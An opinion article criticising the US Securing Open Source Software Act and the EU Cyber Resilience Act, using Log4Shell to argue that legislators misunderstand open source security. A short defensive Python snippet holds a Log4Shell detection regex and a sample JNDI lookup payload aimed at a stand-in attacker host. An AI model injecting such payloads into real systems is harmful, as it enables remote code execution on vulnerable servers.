Open source software (OSS) is mainstream today, but just because it's widely used doesn't mean it's widely understood. And this is especially true when it comes to OSS and security. That lack of understanding, when expressed through legislation, poses a major threat to open source.
Use ≠ Understanding
Despite its widespread use, there's no shortage of misconceptions around open source and security.
Some have argued for security by obscurity. They claim that if source code is visible to the public, it becomes inherently less secure. The logic follows that by knowing what's under the hood, malicious actors can gain insights into vulnerabilities and exploit weaknesses in the codebase. This ignores the fact that security vulnerabilities are discovered in proprietary software all the time without access to source code.
Another gap in understanding covers how open source is produced, where it's deployed within an organization, and how to plan adequately for open source vulnerabilities when they arise.
Organizations have embraced open source to help run their business and enjoy its benefits — but they haven't fully understood or planned for the tradeoffs.
Open source isn't less secure than proprietary software, but that doesn't mean it's exactly like proprietary software, either. Organizations consuming open source software can't expect it to fit neatly into the vendor/supplier model they were used to with proprietary software.
Log4Shell Draws Legislator Attention
This difference was put in the spotlight by the Log4Shell saga that dominated headlines in the latter half of 2021. As most already know, Log4j, the open source logging library from the Apache Logging Services project, was found in late 2021 to have a critical vulnerability, dubbed Log4Shell.
The vulnerability allowed remote code execution (RCE), potentially giving attackers control over a victim's machine. While it was far from the first RCE vulnerability discovered in the wild, Log4j's ubiquity made its potential for damage significant and far-reaching.
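To make the mechanics concrete: vulnerable Log4j versions would evaluate lookup expressions such as `${jndi:ldap://…}` embedded in logged strings, fetching and executing code from an attacker-controlled server. The sketch below (hostnames and the function name are illustrative, not from any real tool) shows how a naive scanner might flag the basic payload syntax; note that real-world payloads often use nested-lookup obfuscation that a simple check like this misses.

```python
import re

# Naive pattern for the Log4Shell lookup syntax, "${jndi:<protocol>://...}".
# Real payloads frequently obfuscate this (e.g. "${${lower:j}ndi:...}"),
# so this is an illustration of the attack shape, not a real defense.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def looks_like_log4shell_probe(log_line: str) -> bool:
    """Return True if a log line contains the basic JNDI lookup syntax."""
    return bool(JNDI_PATTERN.search(log_line))

# An attacker-supplied header that a vulnerable app might log verbatim:
print(looks_like_log4shell_probe("User-Agent: ${jndi:ldap://attacker.example/a}"))
```

The key point is that the payload arrives through ordinary, routinely logged input (HTTP headers, usernames, chat messages), which is why Log4j's ubiquity made the exposure so broad.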
And although in retrospect the devastation was significantly less than what most had anticipated, the fervor was enough to spur legislators on both sides of the Atlantic into action — leading to the Securing Open Source Software Act (SOSSA) in the US and the Cyber Resilience Act (CRA) in the European Union.
Where SOSSA Goes Wrong
Both of these pieces of legislation seem to be ineffective at best and damaging to the open source ecosystem at worst. We'll first look at SOSSA as the less concerning of the two.
First, it creates an impression that open source is uniquely insecure. It isn't — in fact, the opposite is true. Proprietary software has similar problems — you can have widely distributed proprietary software that includes outdated and insecure dependencies and flaws, and no one but the vendor knows what's in the source code or has the means to address those flaws.
Second, SOSSA mandates coordination "as appropriate" and tells the Cybersecurity and Infrastructure Security Agency (CISA) to assist in coordinated vulnerability disclosures, but issues this mandate without offering a dime of funding. If legislators want to get serious about open source security and maintenance, their first move should be to fund its development and participation over the long term. Short-term fixes, like bug and security bounties, create more work for projects than they provide help.
Third, the proposed legislation offers nothing in the way of deterrence. It gives the impression that the legislators view cyberattacks as natural disasters, outside the control of law enforcement, rather than crimes that can be, and should be, aggressively punished.
Ultimately, SOSSA is (in the words of Douglas Adams) "mostly harmless." It could be a lot better, but it could be a lot worse, too. How much worse? The European Commission's Cyber Resilience Act may have some ideas.
What's at Stake With the EU's CRA
A number of organizations and smart people have already written about the impacts of the CRA in its current form. In short, it would impose compliance requirements on hardware and software, including shipping updates, following secure development practices, assessing risks, and so on.
Like SOSSA, the CRA puts the burden on producers of software and looks to producers/manufacturers to secure software. And while it tries to exempt open source software "supplied outside the course of commercial activity," where exactly that line is drawn remains unclear. For example, does a not-for-profit entity that offers some form of support become obligated to comply with these rules?
In short, the CRA is probably not great legislation even if only considering proprietary software. But attempting to impose this legislation on open source software will result in additional burdens for organizations such as the Eclipse Foundation and could have a chilling effect on individual open source participation.
What Governments Should Do With OSS
All of this isn't to say that legislators have no role in improving cybersecurity. If their intent is to harden the security of our modern software stack, there are decidedly better ways they could go about it.
First and foremost, I believe that legislators should focus more of their efforts on deterrence.
Governments would also be wise to develop better legislation and regulation around sensitive data. Rather than putting a burden on producers of software, put it on the entities that hold the data that attracts attackers in the first place.
Finally, rather than simply rolling out restrictions and ever-stricter mandates, governments around the world ought to actually support the open source ecosystem. Hire, fund, and otherwise support teams to help study, maintain, and secure our vital open source infrastructure.
At the end of the day, it's a good thing that governments are raising awareness and attempting to improve civic understanding of open source technologies. Hopefully, these efforts and discussions will lead to increased participation. It's important, though, that an urge to "do something!" in response to specific security incidents doesn't lead to stifling open source development.